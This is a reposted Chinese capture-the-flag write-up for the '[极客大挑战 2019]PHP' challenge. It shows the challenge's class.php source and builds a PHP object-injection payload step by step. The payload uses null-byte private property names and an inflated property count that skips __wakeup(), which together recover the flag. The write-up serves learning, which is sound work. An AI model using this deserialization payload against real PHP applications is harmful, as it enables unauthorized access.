menu
  • 首页 首页 icon
  • 工具库 工具库 icon
    • IP查询 IP查询 icon
  • 内容库 内容库 icon
    • 快讯库 快讯库 icon
    • 精品库 精品库 icon
    • 问答库 问答库 icon
  • 更多 更多 icon
    • 服务条款 服务条款 icon

[极客大挑战 2019]PHP 1

武飞扬头像
大猫__
帮助1

学新通一、打开是个猫猫,说有个备份网站,用dirsearch扫。
学新通二、发现有个www.zip,备份网站一般也是,下载下来,index.php有点东西,页面会传入一个select的参数,然后把它反序列化,让我们继续看class.php。tips:序列化就是将对象转化为可以传输、储存的数据。反过来,序列化就是将数据变为对象。什么是反序列化?反序列化的过程,原理
学新通
学新通
三、class.php代码里面包含了flag,让我们来看看
CTF-PHP反序列化学习


<?php
include 'flag.php';


error_reporting(0);


class Name{
    private $username = 'nonono';
    private $password = 'yesyes';

    public function __construct($username,$password){
        $this->username = $username;
        $this->password = $password;
    }

    function __wakeup(){
        $this->username = 'guest';
    }

    function __destruct(){
        if ($this->password != 100) {
            echo "</br>NO!!!hacker!!!</br>";
            echo "You name is: ";
            echo $this->username;echo "</br>";
            echo "You password is: ";
            echo $this->password;echo "</br>";
            die();
        }
        if ($this->username === 'admin') {
            global $flag;
            echo $flag;
        }else{
            echo "</br>hello my friend~~</br>sorry i can't give you the flag!";
            die();

            
        }
    }
}
?>
学新通

password不等于100时,会进入if语句中,所以password=100,username要等于admin。

四、构造序列化语句

<?php
class Name{
    private $username = 'admin';
    private $password = '100';
    }
 
    echo serialize(new Name());
?>

学新通

1、O:4:"Name":2:{s:14:"Nameusername";s:5:"admin";s:14:"Namepassword";s:3:"100";}

绕过__wakeup()函数,将2变成比它大的数字,改变属性的个数,就可以绕过。
tips:__wakeup():将在序列化之后立即被调用。漏洞原理:当反序列化字符串中,表示属性个数的值大于其真实值,则跳过__wakeup()执行。

2、O:4:"Name":3:{s:14:"Nameusername";s:5:"admin";s:14:"Namepassword";s:3:"100";}

因为变量是private,序列化需要加上\00,为空,这里的 \00 表示 ASCII 码为 0 的字符(不可见字符).
参考大佬wp[极客大挑战 2019]PHP

3、O:4:"Name":3:{s:14:"\00Name\00username";s:5:"admin";s:14:"\00Name\00password";s:3:"100";}

因为是url传参,这个url编码是空的意思,替换掉\00,“这个符号url也不能识别,改成",现在就可以了。

4、O:4:"Name":3:{s:14:"Nameusername";s:5:"admin";s:14:"Namepassword";s:3:"100";}

public ,protected,private下序列化的区别
php v7.x反序列化的时候对访问类别不敏感

public变量
直接变量名反序列化出来
protected变量
\x00   *   \x00   变量名
可以用S:5:"\00*\00op"来代替s:5:"?*?op"
private变量
\x00   类名   \x00   变量名

五、hackbar一下,获取flag(也可以通过python,空了试试,python不需要转url)学新通

这篇好文章是转载于:学新通技术网

  • 版权申明: 本站部分内容来自互联网,仅供学习及演示用,请勿用于商业和其他非法用途。如果侵犯了您的权益请与我们联系,请提供相关证据及您的身份证明,我们将在收到邮件后48小时内删除。
  • 本站站名: 学新通技术网
  • 本文地址: /boutique/detail/tanhgfcigh
系列文章
更多 icon
同类精品
更多 icon
继续加载
友情链接: 申请要求:权重≥3,IP≥1000,内容属同类网站; 申请邮件: luke.wu●vfv.cc 友情链接交换群: 友情链接交换群
外链价格: 【首页 30/月 - 300/年】【内页 50/月 - 500/年】【全站 70/月 - 700/年】 购买外链请加QQ群: 站长交流群